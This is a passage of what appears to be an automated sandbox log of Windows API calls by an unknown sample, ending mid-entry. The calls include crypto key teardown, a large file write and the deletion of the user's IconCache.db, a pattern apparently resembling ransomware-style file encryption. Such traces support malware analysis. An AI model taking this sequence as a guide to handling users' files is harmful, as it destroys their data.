WriteFile (in: hFile=0x4e0, lpBuffer=0x2aaecf8*, nNumberOfBytesToWrite=0x13148, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aaecf8*, lpNumberOfBytesWritten=0x8cf5e4*=0x13148, lpOverlapped=0x0) returned 1 [0168.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.811] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.811] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0168.811] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.811] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0168.811] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.811] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.811] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.811] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0168.812] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.812] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0168.812] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0168.812] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0168.812] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaab28, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0168.812] CryptDestroyKey (hKey=0x9e20b8) returned 1 [0168.812] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.812] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.812] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.812] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.812] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.812] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.812] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.812] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.812] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.812] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.812] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.812] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.812] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0168.812] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.812] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.812] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0168.813] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.813] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.813] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0168.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.813] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0168.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.813] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0168.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.813] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0168.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0168.813] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.813] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0168.813] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.813] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0168.814] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.814] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0168.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.814] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0168.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0168.814] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7180, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0168.814] CryptReleaseContext (hProv=0x9bf330, dwFlags=0x0) returned 1 [0168.814] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.814] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.814] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0168.815] FreeLibrary (hLibModule=0x76390000) returned 1 [0168.815] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.815] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0168.815] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.815] CloseHandle (hObject=0x4ec) returned 1 [0168.816] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.816] CloseHandle (hObject=0x4e0) returned 1 [0168.819] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0168.821] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.821] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.821] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.821] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db", lpFilePart=0x8cedf4*="IconCache.db") returned 0x2a [0168.821] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db")) returned 0x22 [0168.821] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd17602f9, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x13141, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0x9e1e38 [0168.822] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db")) returned 1 [0168.823] FindNextFileW (in: hFindFile=0x9e1e38, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x22, ftCreationTime.dwLowDateTime=0x4a3b706e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x4a3b706e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xd17602f9, ftLastWriteTime.dwHighDateTime=0x1d5d815, nFileSizeHigh=0x0, nFileSizeLow=0x13141, dwReserved0=0x2af0000, dwReserved1=0x8cf0e8, cFileName="IconCache.db", cAlternateFileName="ICONCA~1.DB")) returned 0 [0168.823] FindClose (in: hFindFile=0x9e1e38 | out: hFindFile=0x9e1e38) returned 1 [0168.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0168.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0168.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.827] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6d8 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa810 [0168.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a683a8 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72708 [0168.827] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa678 [0168.827] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7c8 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.827] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf438, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa648 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0168.827] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa678 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6f0 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7c8 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa810 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa6d8 | out: hHeap=0x2af0000) returned 1 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x29f7878 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d78 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5b8 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5b8 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0168.828] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa618 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa630 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5e8 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.828] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5e8 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa630 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x56) returned 0x2a5f7e0 [0168.829] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Local/IconCache.db", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db", lpFilePart=0x8cf650*="IconCache.db") returned 0x2a [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5f7e0 | out: hHeap=0x2af0000) returned 1 [0168.829] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\IconCache.db" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\iconcache.db")) returned 0xffffffff [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa648 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa618 | out: hHeap=0x2af0000) returned 1 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa750 | out: hHeap=0x2af0000) returned 1 [0168.829] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e840 | out: hHeap=0x2af0000) returned 1 [0168.829] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.829] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7c8 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0168.829] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72648 | out: hHeap=0x2af0000) returned 1 [0168.829] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa5d0 [0168.830] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa660 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0168.830] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, 